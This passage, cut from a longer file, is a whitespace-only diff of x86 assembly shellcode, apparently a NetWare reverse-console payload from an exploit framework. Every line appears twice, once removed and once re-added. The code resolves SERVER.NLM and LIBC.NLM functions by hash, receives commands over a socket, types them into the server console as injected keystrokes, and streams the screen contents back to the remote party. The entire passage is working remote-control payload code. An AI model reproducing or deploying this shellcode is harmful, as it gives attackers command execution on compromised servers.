eax, eax + jnz end + cmp [ebp], 0 + jz recv_loop + ; check we are not longer than the key buffer size + cmp [ebp], 32 + jbe recvd + mov [ebp], 32 recvd: - lea eax, [edi+0x20] - push [ebp] - push eax - call recv_data - add esp, 8 + lea eax, [edi+0x20] + push [ebp] + push eax + call recv_data + add esp, 8 - mov ebx, [ebp] - lea esi, [edi+0x20] - mov byte ptr[esi+ebx], 0 + mov ebx, [ebp] + lea esi, [edi+0x20] + mov byte ptr[esi+ebx], 0 -; push 0x00FFFEFF -; mov eax, esp -; push eax -; push [edi+0x10] ; screen -; call [edi-0x3C] ; SERVER.NLM|DirectOutputToScreen -; add esp, 0x0c + ;push 0x00FFFEFF + ;mov eax, esp + ;push eax + ;push [edi+0x10] ; screen + ;call [edi-0x3C] ; SERVER.NLM|DirectOutputToScreen + ;add esp, 0x0c send_input: - movzx eax, byte ptr[esi] - test eax, eax - jz send_end + movzx eax, byte ptr[esi] + test eax, eax + jz send_end - cmp al, 0x0a - jz send_enter + cmp al, 0x0a + jz send_enter - ; we need to inject the command in the console input - push 0x00 - push 0x00 ; should be the keycode in fact - push eax ; key value - push 0x0 - push [edi+0x10] ; screen - call [edi-0x20] ; SERVER.NLM|AddKey - jmp send_next + ; we need to inject the command in the console input + push 0x00 + push 0x00 ; should be the keycode in fact + push eax ; key value + push 0x0 + push [edi+0x10] ; screen + call [edi-0x20] ; SERVER.NLM|AddKey + jmp send_next send_enter: - ; send special code for enter - push 0x1c - push 0x00 - push 0x00 - push 0x02 - push [edi+0x10] ; screen - call [edi-0x20] ; SERVER.NLM|AddKey + ; send special code for enter + push 0x1c + push 0x00 + push 0x00 + push 0x02 + push [edi+0x10] ; screen + call [edi-0x20] ; SERVER.NLM|AddKey - push 0x00FFFEFF - mov eax, esp - push eax - push [edi+0x10] ; screen - call [edi-0x3C] ; SERVER.NLM|DirectOutputToScreen - add esp, 0x0c + push 0x00FFFEFF + mov eax, esp + push eax + push [edi+0x10] ; screen + call [edi-0x3C] ; SERVER.NLM|DirectOutputToScreen + add esp, 0x0c send_next: - add esp, 0x14 - inc esi - jmp send_input + add esp, 0x14 + inc esi + jmp send_input send_end: - jmp recv_loop + jmp recv_loop end: - sub esp, 4 - mov ebp, esp ; rescode + sub esp, 4 + mov ebp, esp ; rescode - push ebp ; rescode - push 2 ; SHUT_RDWR - push [edi-0x40] ; socket - call [edi-0x30] ; LIBC.NLM|bsd_shutdown_mp + push ebp ; rescode + push 2 ; SHUT_RDWR + push [edi-0x40] ; socket + call [edi-0x30] ; LIBC.NLM|bsd_shutdown_mp - push ebp ; rescode - push [edi-0x40] ; socket - call [edi-0x34] ; LIBC.NLM|bsd_close_mp - - ; go back to the main kernel loop - call [edi-0x0C] ; SERVER.NLM|kWorkerThread + push ebp ; rescode + push [edi-0x40] ; socket + call [edi-0x34] ; LIBC.NLM|bsd_close_mp + + ; go back to the main kernel loop + call [edi-0x0C] ; SERVER.NLM|kWorkerThread update_screen: - pushad + pushad - push [edi+0x0c] - push 0 - push [edi+0x08] - push 0 - push [edi+0x10] - call [edi-0x1C] ; SERVER.NLM|ReadScreenIntoBuffer - add esp, 0x14 + push [edi+0x0c] + push 0 + push [edi+0x08] + push 0 + push [edi+0x10] + call [edi-0x1C] ; SERVER.NLM|ReadScreenIntoBuffer + add esp, 0x14 - mov edx, [edi+0x0c] - xor ebx, ebx - xor esi, esi - xor ebp, ebp + mov edx, [edi+0x0c] + xor ebx, ebx + xor esi, esi + xor ebp, ebp checksum: - cmp ebx, [edi+4] - jz end_checksum - xor ecx, ecx + cmp ebx, [edi+4] + jz end_checksum + xor ecx, ecx check_line: - cmp ecx, [edi] - jz next_line - mov al, byte ptr[edx] - ror esi, 0x0d - add esi, eax - cmp [edx], 0x20FFFEFF - jnz check_line2 - mov ebp, ebx - inc ebp + cmp ecx, [edi] + jz next_line + mov al, byte ptr[edx] + ror esi, 0x0d + add esi, eax + cmp [edx], 0x20FFFEFF + jnz check_line2 + mov ebp, ebx + inc ebp check_line2: - inc edx - inc ecx - jmp check_line + inc edx + inc ecx + jmp check_line next_line: - inc ebx - jmp checksum + inc ebx + jmp checksum end_checksum: - cmp esi, [edi+0x14] - jnz new_checksum - cmp [edi+0x18], 1 - jz end_update - mov [edi+0x18], 1 - push ebp - call send_screen - add esp, 4 - jmp end_update + cmp esi, [edi+0x14] + jnz new_checksum + cmp [edi+0x18], 1 + jz end_update + mov [edi+0x18], 1 + push ebp + call send_screen + add esp, 4 + jmp end_update new_checksum: - mov [edi+0x14], esi - mov [edi+0x18], 0 + mov [edi+0x14], esi + mov [edi+0x18], 0 end_update: - popad - ret + popad + ret send_screen: - push ebx + push ebx - sub esp, 4 - mov esi, esp + sub esp, 4 + mov esi, esp - push esi - lea eax, [esi+2] - push eax - push [edi+0x10] - call [edi-0x10] ; SERVER.NLM|GetInputCursorPosition - add esp, 0x0c - - mov ebx, [esp+0x0c] - xor edx, edx - mov ecx, [edi+0x0c] - mov eax, dword ptr[edi] - imul eax, ebx - add ecx, eax + push esi + lea eax, [esi+2] + push eax + push [edi+0x10] + call [edi-0x10] ; SERVER.NLM|GetInputCursorPosition + add esp, 0x0c + + mov ebx, [esp+0x0c] + xor edx, edx + mov ecx, [edi+0x0c] + mov eax, dword ptr[edi] + imul eax, ebx + add ecx, eax send_loop: - cmp bx, word ptr[esi+2] - jae last_line - mov dx, word ptr[edi] - jmp next_send + cmp bx, word ptr[esi+2] + jae last_line + mov dx, word ptr[edi] + jmp next_send last_line: - mov dx, word ptr[esi] + mov dx, word ptr[esi] next_send: - push edx - push ecx - call send_data - add esp, 0x08 - - cmp bx, word ptr[esi+2] - jae end_sl - - push 0x0000000a - mov eax, esp - push 1 - push eax - call send_data - add esp, 0x0C - - inc ebx - add ecx, edx - cmp bx, word ptr[esi+2] - jbe send_loop + push edx + push ecx + call send_data + add esp, 0x08 + + cmp bx, word ptr[esi+2] + jae end_sl + + push 0x0000000a + mov eax, esp + push 1 + push eax + call send_data + add esp, 0x0C + + inc ebx + add ecx, edx + cmp bx, word ptr[esi+2] + jbe send_loop end_sl: - pop ebx - pop ebx - ret + pop ebx + pop ebx + ret send_data: - push [esp+8] - push [esp+8] - push [edi-0x40] - push [edi-0x24] - call sendrecv_data - add esp, 0x10 - ret + push [esp+8] + push [esp+8] + push [edi-0x40] + push [edi-0x24] + call sendrecv_data + add esp, 0x10 + ret recv_data: - push [esp+8] - push [esp+8] - push [edi-0x40] - push [edi-0x28] - call sendrecv_data - add esp, 0x10 - ret + push [esp+8] + push [esp+8] + push [edi-0x40] + push [edi-0x28] + call sendrecv_data + add esp, 0x10 + ret sendrecv_data: - push ebp - push ecx - push ebx - push edx - mov ebp, esp - - push [ebp+0x20] ; iov_len - push [ebp+0x1C] ; iov_base - mov ecx, esp ; msg_iov - - xor ebx, ebx ; struct msghdr - push ebx ; msg_flags - push ebx ; msg_controllen - push ebx ; msg_control - inc ebx - push ebx ; msg_iovlen (1 array) - dec ebx - push ecx ; msg_iov - push ebx ; msg_namelen - push ebx ; msg_name - - mov ecx, esp ; message - - sub esp, 4 - mov edx, esp ; rescode - - push edx ; rescode - push 0 ; flags - push ecx ; message - push [ebp+0x18] ; socket - call [ebp+0x14] ; SERVER.NLM|bsd_recvmsg_mp - - mov esp, ebp - pop edx - pop ebx - pop ecx - pop ebp - ret + push ebp + push ecx + push ebx + push edx + mov ebp, esp + push [ebp+0x20] ; iov_len + push [ebp+0x1C] ; iov_base + mov ecx, esp ; msg_iov + + xor ebx, ebx ; struct msghdr + push ebx ; msg_flags + push ebx ; msg_controllen + push ebx ; msg_control + inc ebx + push ebx ; msg_iovlen (1 array) + dec ebx + push ecx ; msg_iov + push ebx ; msg_namelen + push ebx ; msg_name + + mov ecx, esp ; message + + sub esp, 4 + mov edx, esp ; rescode + + push edx ; rescode + push 0 ; flags + push ecx ; message + push [ebp+0x18] ; socket + call [ebp+0x14] ; SERVER.NLM|bsd_recvmsg_mp + + mov esp, ebp + pop edx + pop ebx + pop ecx + pop ebp + ret + socket_ptr: - dd 0 + dd 0 fct_ptrs: - dd 0xadc21dfc ; SERVER.NLM|DirectUnformattedOutputToScreen - dd 0xb08c8051 ; LIBC.NLM|_ioctlsocket - dd 0x4907702d ; LIBC.NLM|bsd_close_mp - dd 0x312cc527 ; LIBC.NLM|bsd_shutdown_mp - dd 0x46c65ccd ; LIBC.NLM|bsd_select_mp - dd 0x3605cc1c ; LIBC.NLM|bsd_recvmsg_mp - dd 0x35bdd27c ; LIBC.NLM|bsd_sendmsg_mp - dd 0xe98bfec3 ; SERVER.NLM|AddKey - dd 0x6ea378a4 ; SERVER.NLM|ReadScreenIntoBuffer - dd 0x898d560c ; SERVER.NLM|GetScreenSize - dd 0x03cfcbe3 ; SERVER.NLM|GetSystemConsoleScreen - dd 0xfe52051f ; SERVER.NLM|GetInputCursorPosition - dd 0x9294bdcb ; SERVER.NLM|kWorkerThread - dd 0x6877687c ; AFPTCP.NLM|LB_malloc - dd 0xaf50f9e7 ; AFPTCP.NLM|LB_free + dd 0xadc21dfc ; SERVER.NLM|DirectUnformattedOutputToScreen + dd 0xb08c8051 ; LIBC.NLM|_ioctlsocket + dd 0x4907702d ; LIBC.NLM|bsd_close_mp + dd 0x312cc527 ; LIBC.NLM|bsd_shutdown_mp + dd 0x46c65ccd ; LIBC.NLM|bsd_select_mp + dd 0x3605cc1c ; LIBC.NLM|bsd_recvmsg_mp + dd 0x35bdd27c ; LIBC.NLM|bsd_sendmsg_mp + dd 0xe98bfec3 ; SERVER.NLM|AddKey + dd 0x6ea378a4 ; SERVER.NLM|ReadScreenIntoBuffer + dd 0x898d560c ; SERVER.NLM|GetScreenSize + dd 0x03cfcbe3 ; SERVER.NLM|GetSystemConsoleScreen + dd 0xfe52051f ; SERVER.NLM|GetInputCursorPosition + dd 0x9294bdcb ; SERVER.NLM|kWorkerThread + dd 0x6877687c ; AFPTCP.NLM|LB_malloc + dd 0xaf50f9e7 ; AFPTCP.NLM|LB_free screen_info: - dd 0 - dd 0 - dd 0 - dd 0 - dd 0 - dd 0 ; screen checksum - dd 0 ; screen state + dd 0 + dd 0 + dd 0 + dd 0 + dd 0 + dd 0 ; screen checksum + dd 0 ; screen state end_reverse: - nop + nop EOS } ))